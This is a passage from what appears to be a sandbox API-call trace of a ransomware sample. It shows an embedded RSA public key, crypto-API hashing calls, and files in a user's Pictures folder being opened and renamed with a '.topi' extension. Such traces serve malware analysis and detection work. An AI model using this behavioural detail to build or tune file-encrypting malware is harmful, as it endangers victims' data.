KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.679] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0095.680] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.680] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.680] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0095.680] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.680] GetLastError () returned 0x0 [0095.680] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.680] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0095.680] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.680] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.680] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.681] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.681] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x167e0) returned 0x9a06a00 [0095.681] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.681] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0095.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1fe0 [0095.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d95b8 [0095.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f2028 [0095.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d95d0 [0095.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9600 [0095.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9618 [0095.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.682] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0095.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.682] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9600 | out: hHeap=0x680000) returned 1 [0095.682] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9618 | out: hHeap=0x680000) returned 1 [0095.682] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.682] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.682] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0095.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9618 [0095.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0095.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9600 [0095.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0095.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.682] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.682] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9618 | out: hHeap=0x680000) returned 1 [0095.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9600 | out: hHeap=0x680000) returned 1 [0095.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0095.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.683] GetCurrentThreadId () returned 0x8c4 [0095.683] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.683] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f6a00 [0095.683] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.683] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0095.683] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.683] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.683] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.683] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.683] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.684] GetCurrentThreadId () returned 0x8c4 [0095.684] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.684] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.684] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.684] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.684] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.684] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.684] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.684] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.684] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.684] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.684] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0095.684] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.684] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.684] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.684] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.684] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9600 [0095.685] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0095.685] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9618 [0095.685] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.685] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d95e8 [0095.685] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.686] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.686] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.686] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tyuELw6yN-Ep.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tyuelw6yn-ep.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tyuELw6yN-Ep.bmp.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tyuelw6yn-ep.bmp.topi")) returned 1 [0095.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.687] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.688] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0095.688] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8720ead0, ftCreationTime.dwHighDateTime=0x1d5c091, ftLastAccessTime.dwLowDateTime=0xb871aef0, ftLastAccessTime.dwHighDateTime=0x1d5bc3e, ftLastWriteTime.dwLowDateTime=0xb871aef0, ftLastWriteTime.dwHighDateTime=0x1d5bc3e, nFileSizeHigh=0x0, nFileSizeLow=0xfaaa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uloc.png", cAlternateFileName="")) returned 1 [0095.688] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uloc.png") returned=".png" [0095.688] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uloc.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\uloc.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.689] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=64170) returned 1 [0095.689] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.692] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xfa84, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.692] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.693] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0095.695] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.695] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.695] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.695] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0095.695] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.695] GetLastError () returned 0x0 [0095.695] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.695] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0095.695] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.695] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.696] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.696] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.696] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.696] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.696] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.696] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfab0) returned 0x9a06a00 [0095.696] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.696] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.696] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.696] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.697] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.697] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.697] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f2028 [0095.697] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d95d0 [0095.697] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f2070 [0095.697] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d95e8 [0095.697] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9618 [0095.697] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.697] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9630 [0095.697] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.697] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.697] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0095.697] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.697] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9618 | out: hHeap=0x680000) returned 1 [0095.698] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9630 | out: hHeap=0x680000) returned 1 [0095.698] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.698] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.698] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0095.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9630 [0095.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0095.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9618 [0095.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0095.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0095.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.698] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.698] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9630 | out: hHeap=0x680000) returned 1 [0095.698] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.698] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9618 | out: hHeap=0x680000) returned 1 [0095.698] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.698] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.698] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.699] GetCurrentThreadId () returned 0x8c4 [0095.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f6a90 [0095.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0095.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.699] GetCurrentThreadId () returned 0x8c4 [0095.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0095.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9618 [0095.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0095.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9630 [0095.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.700] 